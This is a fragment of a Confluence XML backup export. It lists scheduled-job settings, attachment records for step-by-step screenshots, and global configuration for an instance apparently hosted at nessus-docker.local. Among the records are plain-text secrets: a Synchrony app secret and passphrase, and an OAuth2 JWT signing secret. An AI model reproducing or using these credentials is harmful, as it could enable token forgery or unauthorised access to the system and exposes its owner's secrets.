<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32881</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.efi.store.GlobalStorageServiceImpl]]></property>
|
||||
<property name="key"><![CDATA[efi.store.onboarding.onboardingNumberOfUsersCheckJob]]></property>
|
||||
<property name="value"><![CDATA[<string>JOB_FIRST_EXECUTE</string>]]></property>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98356</id>
|
||||
<property name="hibernateVersion">3</property>
|
||||
<property name="title"><![CDATA[step-2-image-3.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step-2-image-3.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262196</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262198</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262199</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262210</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32878</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#createBlueprintPageEntityCleanupJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32879</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#batchingJobConfig]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32876</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.efi.store.GlobalStorageServiceImpl]]></property>
|
||||
<property name="key"><![CDATA[efi.store.onboarding.onboardingSpaceCheckJob]]></property>
|
||||
<property name="value"><![CDATA[<string>JOB_FIRST_EXECUTE</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32877</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#cleanupTrigger]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32874</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#summaryEmail]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98349</id>
|
||||
<property name="hibernateVersion">18</property>
|
||||
<property name="title"><![CDATA[next.jpg]]></property>
|
||||
<property name="lowerTitle"><![CDATA[next.jpg]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262225</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262233</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262237</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32875</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#onboardingSpaceCheckJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98350</id>
|
||||
<property name="hibernateVersion">19</property>
|
||||
<property name="title"><![CDATA[step04-01.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step04-01.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262202</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262208</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262234</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262241</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">4</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32872</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#jira-metadata-cache-config]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98347</id>
|
||||
<property name="hibernateVersion">17</property>
|
||||
<property name="title"><![CDATA[start.jpg]]></property>
|
||||
<property name="lowerTitle"><![CDATA[start.jpg]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262206</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262231</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262232</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32873</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#deletedInviteesCleanUpJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98348</id>
|
||||
<property name="hibernateVersion">20</property>
|
||||
<property name="title"><![CDATA[step06-image02.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step06-image02.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262215</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262216</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262217</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262221</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">3</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32870</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#flushEdgeIndexQueue]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98353</id>
|
||||
<property name="hibernateVersion">21</property>
|
||||
<property name="title"><![CDATA[step06-image01.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step06-image01.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262218</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262219</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262220</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262261</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">4</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32871</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#conversionQueueMonitor]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98354</id>
|
||||
<property name="hibernateVersion">3</property>
|
||||
<property name="title"><![CDATA[step05-01.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step05-01.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262266</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262267</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262268</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262269</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32868</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#addonHouskeeperTrigger-v2]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98351</id>
|
||||
<property name="hibernateVersion">9</property>
|
||||
<property name="title"><![CDATA[step05-03.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step05-03.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262245</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262257</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262263</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262264</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">2</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32869</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#purgeHistoryJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98352</id>
|
||||
<property name="hibernateVersion">8</property>
|
||||
<property name="title"><![CDATA[step04-02.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step04-02.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262251</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262252</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262253</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262272</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32834</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[synchrony_collaborative_editor_app_id]]></property>
|
||||
<property name="value"><![CDATA[<string>Synchrony-0fccd6a4-3e18-398a-8fe4-ff41cdd6c7ad</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32835</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[synchrony_collaborative_editor_app_secret]]></property>
|
||||
<property name="value"><![CDATA[<string>ZmUL2wyLlx8ROyTY/satsTeR2J61ADRUqTnTe8Ai1og=</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32832</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.analytics.client.configuration..logged_base_analytics_data]]></property>
|
||||
<property name="value"><![CDATA[<string>true</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32833</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-update]]></property>
|
||||
<property name="value"><![CDATA[<list>
|
||||
<string>com.atlassian.migration.agent</string>
|
||||
<string>com.atlassian.troubleshooting.plugin-confluence</string>
|
||||
</list>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32830</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[synchrony_collaborative_editor_app_base_url]]></property>
|
||||
<property name="value"><![CDATA[<string>http://nessus-docker.local:8090/synchrony-proxy,http://nessus-docker.local:8090/synchrony-proxy</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32831</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[synchrony_collaborative_editor_app_passphrase]]></property>
|
||||
<property name="value"><![CDATA[<string>BxPVX1EMs+EycDmXIAthliGTBb3EAwLgeyaTxHBW4CE=</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32828</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-license.expired]]></property>
|
||||
<property name="value"><![CDATA[<list/>]]></property>
|
||||
</object>
|
||||
<object class="AlertEntityImpl" package="com.atlassian.confluence.internal.diagnostics.persistence.dao.hibernate">
|
||||
<id name="id">720897</id>
|
||||
<property name="detailsJson"><![CDATA[{"freeInMegabytes":144,"totalInMegabytes":4160,"minimumInMegabytes":256}]]></property>
|
||||
<property name="issueComponentId"><![CDATA[OS]]></property>
|
||||
<property name="issueId"><![CDATA[OS-1001]]></property>
|
||||
<property name="issueSeverity" enum-class="Severity" package="com.atlassian.diagnostics">WARNING</property>
|
||||
<property name="nodeName"><![CDATA[3b0401e4191f]]></property>
|
||||
<property name="nodeNameLower"><![CDATA[3b0401e4191f]]></property>
|
||||
<property name="timestampUtc">1699509909923</property>
|
||||
<property name="triggerModule"/><property name="triggerPluginKey"><![CDATA[not-detected]]></property>
|
||||
<property name="triggerPluginKeyLower"><![CDATA[not-detected]]></property>
|
||||
<property name="triggerPluginVersion"/></object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32829</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-license.nearlyexpired]]></property>
|
||||
<property name="value"><![CDATA[<list/>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32826</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-maintenance.expired]]></property>
|
||||
<property name="value"><![CDATA[<list/>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32827</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-maintenance.nearlyexpired]]></property>
|
||||
<property name="value"><![CDATA[<list/>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32824</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-evaluation.expired]]></property>
|
||||
<property name="value"><![CDATA[<list/>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32825</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-evaluation.nearlyexpired]]></property>
|
||||
<property name="value"><![CDATA[<list/>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32822</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-plugin.request]]></property>
|
||||
<property name="value"><![CDATA[<list/>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32823</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.analytics.client.configuration..analytics_enabled]]></property>
|
||||
<property name="value"><![CDATA[<string>true</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32820</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.plugins.oauth2.provider.jwt.secret]]></property>
|
||||
<property name="value"><![CDATA[<string>385f48cdf4038b1577ad4191bff5fc8ae24efbb9aaf8fea882b4d535f0297a33</string>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32821</id>
|
||||
<property name="context"><![CDATA[_GLOBAL]]></property>
|
||||
<property name="key"><![CDATA[com.atlassian.upm:notifications:notification-edition.mismatch]]></property>
|
||||
<property name="value"><![CDATA[<list/>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32850</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#FlushContentIndexScheduledJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32851</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#FlushChangeIndexScheduledJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32848</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#ExpiredUserVerificationTokenCleanupJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32849</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#VersionHardRemovalScheduledJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>false</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32846</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#DeferredFileDeletionJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
</com.atlassian.confluence.schedule.ScheduledJobConfiguration>]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
|
||||
<id name="id">32847</id>
|
||||
<property name="context"><![CDATA[com.atlassian.confluence.schedule.ScheduledJobConfiguration]]></property>
|
||||
<property name="key"><![CDATA[DEFAULT#TrashSoftRemovalScheduledJob]]></property>
|
||||
<property name="value"><![CDATA[<com.atlassian.confluence.schedule.ScheduledJobConfiguration>
|
||||
<enabled>true</enabled>
|
||||
<cronSchedule/>
|
||||
<repeatInterval/>
|
||||
